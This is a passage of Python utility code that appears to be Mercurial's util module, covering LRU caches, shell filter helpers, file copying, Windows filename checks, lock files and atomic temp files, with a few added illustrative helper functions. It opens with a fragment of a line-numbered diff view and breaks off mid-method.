953 """copy-on-write sortdict
956 """copy-on-write sortdict
954
957
955 Be sure to call d = d.preparewrite() before writing to d.
958 Be sure to call d = d.preparewrite() before writing to d.
956 """
959 """
957
960
958 class transactional(object):
961 class transactional(object):
959 """Base class for making a transactional type into a context manager."""
962 """Base class for making a transactional type into a context manager."""
960 __metaclass__ = abc.ABCMeta
963 __metaclass__ = abc.ABCMeta
961
964
962 @abc.abstractmethod
965 @abc.abstractmethod
963 def close(self):
966 def close(self):
964 """Successfully closes the transaction."""
967 """Successfully closes the transaction."""
965
968
966 @abc.abstractmethod
969 @abc.abstractmethod
967 def release(self):
970 def release(self):
968 """Marks the end of the transaction.
971 """Marks the end of the transaction.
969
972
970 If the transaction has not been closed, it will be aborted.
973 If the transaction has not been closed, it will be aborted.
971 """
974 """
972
975
973 def __enter__(self):
976 def __enter__(self):
974 return self
977 return self
975
978
976 def __exit__(self, exc_type, exc_val, exc_tb):
979 def __exit__(self, exc_type, exc_val, exc_tb):
977 try:
980 try:
978 if exc_type is None:
981 if exc_type is None:
979 self.close()
982 self.close()
980 finally:
983 finally:
981 self.release()
984 self.release()
982
985
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns
    """
    if not tr:
        yield
        return
    try:
        yield
        tr.close()
    except error.InterventionRequired:
        tr.close()
        raise
    finally:
        tr.release()

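# An illustrative sketch (not part of the original module) of how
# acceptintervention() behaves: InterventionRequired closes (keeps) the
# transaction instead of aborting it, then propagates. The helper name and
# message are hypothetical; 'tr' is any transactional object.
def _demo_acceptintervention(tr):
    try:
        with acceptintervention(tr):
            raise error.InterventionRequired('resolve conflicts, then resume')
    except error.InterventionRequired:
        # tr.close() already ran inside the context manager; any other
        # exception type would have left the transaction to be aborted
        # by tr.release().
        pass
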
@contextlib.contextmanager
def nullcontextmanager():
    yield

class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """
    __slots__ = (u'next', u'prev', u'key', u'value')

    def __init__(self):
        self.next = None
        self.prev = None

        self.key = _notset
        self.value = None

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset

class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.
    """
    def __init__(self, max):
        self._cache = {}

        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1
        self._capacity = max

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def __setitem__(self, k, v):
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            node.value = v
            self._movetohead(node)
            return

        if self._size < self._capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

        # At capacity. Kill the old entry.
        if node.key is not _notset:
            del self._cache[node.key]

        node.key = k
        node.value = v
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

    def __delitem__(self, k):
        node = self._cache.pop(k)
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

    # Additional dict methods.

    def get(self, k, default=None):
        try:
            return self._cache[k].value
        except KeyError:
            return default

    def clear(self):
        n = self._head
        while n.key is not _notset:
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self):
        result = lrucachedict(self._capacity)
        n = self._head.prev
        # Iterate in oldest-to-newest order, so the copy has the right ordering
        for i in range(len(self._cache)):
            result[n.key] = n.value
            n = n.prev
        return result

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node

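# An illustrative sketch (not part of the original module): eviction order
# of lrucachedict. The helper name is hypothetical and exists only to
# document the behavior described in the class docstring above.
def _demo_lrucachedict():
    d = lrucachedict(2)
    d['a'] = 1
    d['b'] = 2
    d['a']          # a read moves 'a' to the head (newest) position
    d['c'] = 3      # at capacity: the oldest entry, 'b', is recycled
    assert 'b' not in d
    assert d.get('a') == 1 and d.get('c') == 3
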
def lrucachefunc(func):
    '''cache most recent results of function calls'''
    cache = {}
    order = collections.deque()
    if func.__code__.co_argcount == 1:
        def f(arg):
            if arg not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[arg] = func(arg)
            else:
                order.remove(arg)
            order.append(arg)
            return cache[arg]
    else:
        def f(*args):
            if args not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[args] = func(*args)
            else:
                order.remove(args)
            order.append(args)
            return cache[args]

    return f

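# An illustrative sketch (not part of the original module): lrucachefunc as
# a memoizer. The wrapped function is hypothetical; each distinct argument
# is computed once until it falls off the ~20-entry recency window.
def _demo_lrucachefunc():
    calls = []
    def square(x):
        calls.append(x)
        return x * x
    cached = lrucachefunc(square)
    assert cached(3) == 9
    assert cached(3) == 9   # served from the cache; square() not re-run
    assert calls == [3]
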
class propertycache(object):
    def __init__(self, func):
        self.func = func
        self.name = func.__name__
    def __get__(self, obj, type=None):
        result = self.func(obj)
        self.cachevalue(obj, result)
        return result

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value

def clearcachedproperty(obj, prop):
    '''clear a cached property value, if one has been set'''
    if prop in obj.__dict__:
        del obj.__dict__[prop]

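# An illustrative sketch (not part of the original module): propertycache
# computes once, then the cached instance attribute shadows the (non-data)
# descriptor on later reads. The class below is hypothetical.
def _demo_propertycache():
    class counter(object):
        runs = 0
        @propertycache
        def value(self):
            counter.runs += 1
            return 42
    c = counter()
    assert c.value == 42 and c.value == 42
    assert counter.runs == 1           # second read hit c.__dict__, not func
    clearcachedproperty(c, 'value')
    assert c.value == 42 and counter.runs == 2
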
def pipefilter(s, cmd):
    '''filter string S through command CMD, returning its output'''
    p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                         stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    pout, perr = p.communicate(s)
    return pout

def tempfilter(s, cmd):
    '''filter string S through a pair of temporary files with CMD.
    CMD is used as a template to create the real command to be run,
    with the strings INFILE and OUTFILE replaced by the real names of
    the temporary files generated.'''
    inname, outname = None, None
    try:
        infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
        fp = os.fdopen(infd, pycompat.sysstr('wb'))
        fp.write(s)
        fp.close()
        outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
        os.close(outfd)
        cmd = cmd.replace('INFILE', inname)
        cmd = cmd.replace('OUTFILE', outname)
        code = os.system(cmd)
        if pycompat.sysplatform == 'OpenVMS' and code & 1:
            code = 0
        if code:
            raise Abort(_("command '%s' failed: %s") %
                        (cmd, explainexit(code)))
        return readfile(outname)
    finally:
        try:
            if inname:
                os.unlink(inname)
        except OSError:
            pass
        try:
            if outname:
                os.unlink(outname)
        except OSError:
            pass

filtertable = {
    'tempfile:': tempfilter,
    'pipe:': pipefilter,
}

def filter(s, cmd):
    "filter a string through a command that transforms its input to its output"
    for name, fn in filtertable.iteritems():
        if cmd.startswith(name):
            return fn(s, cmd[len(name):].lstrip())
    return pipefilter(s, cmd)

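# An illustrative sketch (not part of the original module): the two
# spellings filter() can dispatch on. The shell commands are hypothetical
# examples and assume a POSIX shell with 'tr' and 'cp' available.
def _demo_filter():
    # 'pipe:' (or no prefix at all) streams the data through stdin/stdout:
    upper = filter('data\n', 'pipe: tr a-z A-Z')          # -> 'DATA\n'
    # 'tempfile:' materializes INFILE, runs the command, reads OUTFILE back:
    copied = filter('data\n', 'tempfile: cp INFILE OUTFILE')
    return upper, copied
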
def binary(s):
    """return true if a string is binary data"""
    return bool(s and '\0' in s)

def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max'''
    def log2(x):
        if not x:
            return 0
        i = 0
        while x:
            x >>= 1
            i += 1
        return i - 1

    buf = []
    blen = 0
    for chunk in source:
        buf.append(chunk)
        blen += len(chunk)
        if blen >= min:
            if min < max:
                min = min << 1
                nmin = 1 << log2(blen)
                if nmin > min:
                    min = nmin
                if min > max:
                    min = max
            yield ''.join(buf)
            blen = 0
            buf = []
    if buf:
        yield ''.join(buf)

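# An illustrative sketch (not part of the original module): feeding many
# tiny chunks through increasingchunks() yields progressively larger
# batches, which keeps per-chunk overhead bounded on long streams.
def _demo_increasingchunks():
    source = ('x' for _ in range(8192))          # 8192 one-byte chunks
    sizes = [len(c) for c in increasingchunks(source, min=1024, max=4096)]
    assert sizes[0] == 1024                      # first batch at min
    assert all(s <= 4096 for s in sizes)         # later batches capped at max
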
Abort = error.Abort

def always(fn):
    return True

def never(fn):
    return False

def nogc(func):
    """disable garbage collector

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking has
    no effect on when GCs are triggered, only on what objects the GC looks
    into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue has been fixed in 2.7. But it still affects
    CPython's performance.
    """
    def wrapper(*args, **kwargs):
        gcenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            if gcenabled:
                gc.enable()
    return wrapper

if pycompat.ispypy:
    # PyPy runs slower with gc disabled
    nogc = lambda x: x

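# An illustrative sketch (not part of the original module): nogc as a
# decorator. Collection is disabled only for the duration of the call and
# only re-enabled if it was enabled beforehand; on PyPy the decorator is
# the identity function per the override above.
@nogc
def _demo_buildbigdict(n):
    # builds many container objects without intermediate GC passes
    return dict((i, (i, i)) for i in range(n))
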
def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            return os.path.join(root, localpath(n2))
        n2 = '/'.join((pconvert(root), n2))
    a, b = splitpath(n1), n2.split('/')
    a.reverse()
    b.reverse()
    while a and b and a[-1] == b[-1]:
        a.pop()
        b.pop()
    b.reverse()
    return pycompat.ossep.join((['..'] * len(a)) + b) or '.'

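# An illustrative sketch (not part of the original module): pathto() pops
# the common prefix of both paths, then climbs out of whatever remains of
# n1. The paths are hypothetical and assume a POSIX platform (os.sep '/').
def _demo_pathto():
    # 'docs' is shared, 'build' remains in n1 (one '..'), and
    # 'index.txt' remains in n2:
    assert pathto('/repo', 'docs/build', 'docs/index.txt') == '../index.txt'
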
def mainfrozen():
    """return True if we are a frozen executable.

    The code supports py2exe (most common, Windows only) and tools/freeze
    (portable, not much used).
    """
    return (safehasattr(sys, "frozen") or # new py2exe
            safehasattr(sys, "importers") or # old py2exe
            imp.is_frozen(u"__main__")) # tools/freeze

# the location of data files matching the source code
if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
    # executable version (py2exe) doesn't support __file__
    datapath = os.path.dirname(pycompat.sysexecutable)
else:
    datapath = os.path.dirname(pycompat.fsencode(__file__))

i18n.setdatapath(datapath)

_hgexecutable = None

def hgexecutable():
    """return location of the 'hg' executable.

    Defaults to $HG or 'hg' in the search path.
    """
    if _hgexecutable is None:
        hg = encoding.environ.get('HG')
        mainmod = sys.modules[pycompat.sysstr('__main__')]
        if hg:
            _sethgexecutable(hg)
        elif mainfrozen():
            if getattr(sys, 'frozen', None) == 'macosx_app':
                # Env variable set by py2app
                _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
            else:
                _sethgexecutable(pycompat.sysexecutable)
        elif (os.path.basename(
            pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
            _sethgexecutable(pycompat.fsencode(mainmod.__file__))
        else:
            exe = findexe('hg') or os.path.basename(sys.argv[0])
            _sethgexecutable(exe)
    return _hgexecutable

def _sethgexecutable(path):
    """set location of the 'hg' executable"""
    global _hgexecutable
    _hgexecutable = path

def _isstdout(f):
    fileno = getattr(f, 'fileno', None)
    try:
        return fileno and fileno() == sys.__stdout__.fileno()
    except io.UnsupportedOperation:
        return False # fileno() raised UnsupportedOperation

def shellenviron(environ=None):
    """return environ with optional override, useful for shelling out"""
    def py2shell(val):
        'convert python object into string that is useful to shell'
        if val is None or val is False:
            return '0'
        if val is True:
            return '1'
        return pycompat.bytestr(val)
    env = dict(encoding.environ)
    if environ:
        env.update((k, py2shell(v)) for k, v in environ.iteritems())
    env['HG'] = hgexecutable()
    return env

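# An illustrative sketch (not part of the original module): py2shell()
# flattens Python values into strings a shell hook can test directly. The
# keys below are hypothetical; this assumes the Python 2 dict semantics
# (iteritems) that this module targets.
def _demo_shellenviron():
    env = shellenviron({'HG_VERBOSE': True, 'HG_QUIET': None})
    assert env['HG_VERBOSE'] == '1'    # True -> '1'
    assert env['HG_QUIET'] == '0'      # None and False -> '0'
    assert 'HG' in env                 # path to hg is always injected
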
def system(cmd, environ=None, cwd=None, out=None):
    '''enhanced shell command execution.
    run with environment maybe modified, maybe in different dir.

    if out is specified, it is assumed to be a file-like object that has a
    write() method. stdout and stderr will be redirected to out.'''
    try:
        stdout.flush()
    except Exception:
        pass
    cmd = quotecommand(cmd)
    env = shellenviron(environ)
    if out is None or _isstdout(out):
        rc = subprocess.call(cmd, shell=True, close_fds=closefds,
                             env=env, cwd=cwd)
    else:
        proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                                env=env, cwd=cwd, stdout=subprocess.PIPE,
                                stderr=subprocess.STDOUT)
        for line in iter(proc.stdout.readline, ''):
            out.write(line)
        proc.wait()
        rc = proc.returncode
    if pycompat.sysplatform == 'OpenVMS' and rc & 1:
        rc = 0
    return rc

def checksignature(func):
    '''wrap a function with code to check for calling errors'''
    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
                raise error.SignatureError
            raise

    return check

# a whitelist of known filesystems where hardlinks work reliably
_hardlinkfswhitelist = {
    'btrfs',
    'ext2',
    'ext3',
    'ext4',
    'hfs',
    'jfs',
    'NTFS',
    'reiserfs',
    'tmpfs',
    'ufs',
    'xfs',
    'zfs',
}

def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            oldstat = checkambig and filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype not in _hardlinkfswhitelist:
            hardlink = False
    if hardlink:
        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
            pass # fall back to normal copy
    if os.path.islink(src):
        os.symlink(os.readlink(src), dest)
        # copytime is ignored for symlinks, but in general copytime isn't needed
        # for them anyway
    else:
        try:
            shutil.copyfile(src, dest)
            if copystat:
                # copystat also copies mode
                shutil.copystat(src, dest)
            else:
                shutil.copymode(src, dest)
            if oldstat and oldstat.stat:
                newstat = filestat.frompath(dest)
                if newstat.isambig(oldstat):
                    # stat of copied file is ambiguous to original one
                    advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
                    os.utime(dest, (advanced, advanced))
        except shutil.Error as inst:
            raise Abort(str(inst))

def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
    """Copy a directory tree using hardlinks if possible."""
    num = 0

    gettopic = lambda: hardlink and _('linking') or _('copying')

    if os.path.isdir(src):
        if hardlink is None:
            hardlink = (os.stat(src).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            def nprog(t, pos):
                if pos is not None:
                    return progress(t, pos + num)
            hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
            num += n
    else:
        if hardlink is None:
            hardlink = (os.stat(os.path.dirname(src)).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        num += 1
        progress(topic, num)
    progress(topic, None)

    return hardlink, num

_winreservednames = {
    'con', 'prn', 'aux', 'nul',
    'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
    'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
}
_winreservedchars = ':*?"<>|'
def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith('\\'):
        return _("filename ends with '\\', which is invalid on Windows")
    if '\\/' in path:
        return _("directory name ends with '\\', which is invalid on Windows")
    for n in path.replace('\\', '/').split('/'):
        if not n:
            continue
        for c in _filenamebytestr(n):
            if c in _winreservedchars:
                return _("filename contains '%s', which is reserved "
                         "on Windows") % c
            if ord(c) <= 31:
                return _("filename contains '%s', which is invalid "
                         "on Windows") % escapestr(c)
        base = n.split('.')[0]
        if base and base.lower() in _winreservednames:
            return _("filename contains '%s', which is reserved "
                     "on Windows") % base
        t = n[-1:]
        if t in '. ' and n not in '..':
            return _("filename ends with '%s', which is not allowed "
                     "on Windows") % t

if pycompat.iswindows:
    checkosfilename = checkwinfilename
    timer = time.clock
else:
    checkosfilename = platform.checkosfilename
    timer = time.time

if safehasattr(time, "perf_counter"):
    timer = time.perf_counter

def makelock(info, pathname):
    try:
        return os.symlink(info, pathname)
    except OSError as why:
        if why.errno == errno.EEXIST:
            raise
    except AttributeError: # no symlink in os
        pass

    ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
    os.write(ld, info)
    os.close(ld)

def readlock(pathname):
    try:
        return os.readlink(pathname)
    except OSError as why:
        if why.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    except AttributeError: # no symlink in os
        pass
    fp = posixfile(pathname)
    r = fp.read()
    fp.close()
    return r

def fstat(fp):
    '''stat file object that may not have fileno method.'''
    try:
        return os.fstat(fp.fileno())
    except AttributeError:
        return os.stat(fp.name)

# File system features

def fscasesensitive(path):
    """
    Return true if the given path is on a case-sensitive filesystem

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.
    """
    s1 = os.lstat(path)
    d, b = os.path.split(path)
    b2 = b.upper()
    if b == b2:
        b2 = b.lower()
        if b == b2:
            return True # no evidence against case sensitivity
    p2 = os.path.join(d, b2)
    try:
        s2 = os.lstat(p2)
        if s2 == s1:
            return False
        return True
    except OSError:
        return True

try:
    import re2
    _re2 = None
except ImportError:
    _re2 = False

class _re(object):
    def _checkre2(self):
        global _re2
        try:
            # check if match works, see issue3964
            _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
            if flags & remod.IGNORECASE:
                pat = '(?i)' + pat
            if flags & remod.MULTILINE:
                pat = '(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        if _re2:
            return re2.escape
        else:
            return remod.escape

re = _re()

_fspathcache = {}
def fspath(name, root):
    '''Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.
    '''
    def _makefspathcacheentry(dir):
        return dict((normcase(n), n) for n in os.listdir(dir))

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly.
    seps.replace('\\','\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patch of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        result.append(found or part)
        dir = os.path.join(dir, part)

    return ''.join(result)

def checknlink(testfile):
    '''check whether hardlink count reporting works properly'''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    f1, f2, fp = None, None, None
    try:
        fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
                                  suffix='1~', dir=os.path.dirname(testfile))
        os.close(fd)
        f2 = '%s2~' % f1[:-2]

        oslink(f1, f2)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        fp = posixfile(f2)
        return nlinks(f2) > 1
    except OSError:
        return False
    finally:
        if fp is not None:
            fp.close()
        for f in (f1, f2):
            try:
                if f is not None:
                    os.unlink(f)
            except OSError:
                pass

def endswithsep(path):
    '''Check path ends with os.sep or os.altsep.'''
    return (path.endswith(pycompat.ossep)
            or pycompat.osaltsep and path.endswith(pycompat.osaltsep))

def splitpath(path):
    '''Split path by os.sep.
    Note that this function does not use os.altsep because this is
    an alternative to a simple "xxx.split(os.sep)".
    It is recommended to use os.path.normpath() before using this
    function if needed.'''
    return path.split(pycompat.ossep)

def gui():
    '''Are we running in a GUI?'''
    if pycompat.isdarwin:
        if 'SSH_CONNECTION' in encoding.environ:
            # handle SSH access to a box where the user is logged in
            return False
        elif getattr(osutil, 'isgui', None):
            # check if a CoreGraphics session is available
            return osutil.isgui()
        else:
            # pure build; use a safe default
            return True
    else:
        return pycompat.iswindows or encoding.environ.get("DISPLAY")

def mktempcopy(name, emptyok=False, createmode=None):
    """Create a temporary file with the same contents from name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file.
    """
    d, fn = os.path.split(name)
    fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want. If the original file already exists, just copy
    # its mode. Otherwise, manually obey umask.
    copymode(name, temp, createmode)
    if emptyok:
        return temp
    try:
        try:
            ifp = posixfile(name, "rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        ofp = posixfile(temp, "wb")
        for chunk in filechunkiter(ifp):
            ofp.write(chunk)
        ifp.close()
        ofp.close()
    except: # re-raises
        try:
            os.unlink(temp)
        except OSError:
            pass
        raise
    return temp

class filestat(object):
    """Helper to reliably detect changes of a file.

    The 'stat' attribute is the result of 'os.stat()' if the specified
    'path' exists; otherwise it is None. This spares callers of this
    class a preparatory 'exists()' check.
    """
    def __init__(self, stat):
        self.stat = stat

    @classmethod
    def frompath(cls, path):
        try:
            stat = os.stat(path)
        except OSError as err:
            if err.errno != errno.ENOENT:
                raise
            stat = None
        return cls(stat)

    @classmethod
    def fromfp(cls, fp):
        stat = os.fstat(fp.fileno())
        return cls(stat)

    __hash__ = object.__hash__

    def __eq__(self, old):
        try:
            # if ambiguity between stat of new and old file is
            # avoided, comparison of size, ctime and mtime is enough
            # to exactly detect change of a file regardless of platform
            return (self.stat.st_size == old.stat.st_size and
                    self.stat.st_ctime == old.stat.st_ctime and
                    self.stat.st_mtime == old.stat.st_mtime)
        except AttributeError:
            pass
        try:
            return self.stat is None and old.stat is None
        except AttributeError:
            return False

    def isambig(self, old):
        """Examine whether the new (= self) stat is ambiguous against the old one

        "S[N]" below means the stat of a file at the N-th change:

        - S[n-1].ctime  < S[n].ctime: can detect change of a file
        - S[n-1].ctime == S[n].ctime
          - S[n-1].ctime  < S[n].mtime: means natural advancing (*1)
          - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
          - S[n-1].ctime  > S[n].mtime: never occurs naturally (don't care)
        - S[n-1].ctime  > S[n].ctime: never occurs naturally (don't care)

        Case (*2) above means that a file was changed twice or more
        within the same second (= S[n-1].ctime), so comparing
        timestamps alone is ambiguous.

        The basic idea for avoiding such ambiguity is to advance mtime
        by one second whenever the timestamp is ambiguous.

        But advancing mtime only in case (*2) doesn't work as
        expected, because a naturally advanced S[n].mtime in case (*1)
        might be equal to a manually advanced S[n-1 or earlier].mtime.

        Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
        treated as ambiguous regardless of mtime, so that changes are
        not overlooked when such mtimes collide.

        Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
        S[n].mtime", even if the size of the file hasn't changed.
        """
        try:
            return (self.stat.st_ctime == old.stat.st_ctime)
        except AttributeError:
            return False

    def avoidambig(self, path, old):
        """Change the file stat of the specified path to avoid ambiguity

        'old' should be the previous filestat of 'path'.

        If the process lacks the privileges needed to touch 'path',
        ambiguity avoidance is skipped and this returns False.

        Otherwise this returns True, meaning the ambiguity has been
        avoided.
        """
        advanced = (old.stat.st_mtime + 1) & 0x7fffffff
        try:
            os.utime(path, (advanced, advanced))
        except OSError as inst:
            if inst.errno == errno.EPERM:
                # utime() on a file created by another user causes EPERM,
                # if the process doesn't have appropriate privileges
                return False
            raise
        return True

    def __ne__(self, other):
        return not self == other

class atomictempfile(object):
    '''writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    The checkambig argument of the constructor is used with filestat,
    and is useful only if the target file is guarded by a lock
    (e.g. repo.lock or repo.wlock).
    '''
    def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
        self.__name = name # permanent name
        self._tempname = mktempcopy(name, emptyok=('w' in mode),
                                    createmode=createmode)
        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods
        self.read = self._fp.read
        self.write = self._fp.write
        self.seek = self._fp.seek
        self.tell = self._fp.tell
        self.fileno = self._fp.fileno

    def close(self):
        if not self._fp.closed:
            self._fp.close()
            filename = localpath(self.__name)
            oldstat = self._checkambig and filestat.frompath(filename)
            if oldstat and oldstat.stat:
                rename(self._tempname, filename)
                newstat = filestat.frompath(filename)
                if newstat.isambig(oldstat):
                    # stat of changed file is ambiguous to original one
                    advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
                    os.utime(filename, (advanced, advanced))
            else:
                rename(self._tempname, filename)

    def discard(self):
        if not self._fp.closed:
            try:
                os.unlink(self._tempname)
            except OSError:
                pass
            self._fp.close()

    def __del__(self):
